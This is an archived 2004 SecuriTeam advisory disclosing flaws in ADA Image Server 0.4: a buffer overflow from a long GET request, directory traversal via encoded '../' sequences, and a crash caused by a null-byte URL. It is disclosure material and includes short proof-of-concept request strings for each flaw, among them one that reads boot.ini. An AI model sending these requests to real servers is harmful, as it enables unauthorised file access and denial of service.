[NT] ADA Image Server (ImgSvr) Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 04/15/04
- Previous message: SecuriTeam: "[NT] SurgeLDAP Web Service user.cgi File Retrieval"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 15 Apr 2004 17:07:04 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ADA Image Server (ImgSvr) Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/adaimgsvr/> ADA Image Server is "an
embedded web server that is specialized in photo album publishing. This
Image server provides an HTTP based access to image content. It generate
dynamic pages from a standard directory based hierarchy, manage
thumbnails, metadatas". Multiple security vulnerabilities have been found
in the product these include buffer overflow in GET request, directory
traversal vulnerabilities, and DoS vulnerabilities.
DETAILS
Vulnerable Systems:
* ADA Image Server (ImgSvr) version 0.4
Buffer Overflow in GET / request:
There is a buffer overflow in ADA image server that occurs whenever an
attacker sends a GET request followed by 2,112 characters. An attacker may
exploit this vulnerability to make your web server crash or even execute
arbitrary code:
Get /[2,112 chars] http/1.0
Directory Traversal Vulnerabilities
The vulnerability occurs whenever an attacker uses the pattern
"%2f%2e%2e%2f", as these are not properly checked for directory traversal,
an attacker can download any file that resides outside the bounding HTML
root directory:
http://[host]:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
Or view the directories content:
http://[host]:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Denial of Service:
By supplying a "%00" in the URL, a remote user can crash the server using
the following request:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe
/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe
/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
ADDITIONAL INFORMATION
The information has been provided by <mailto:dr_insane@pathfinder.gr>
dr_insane.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] SurgeLDAP Web Service user.cgi File Retrieval"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
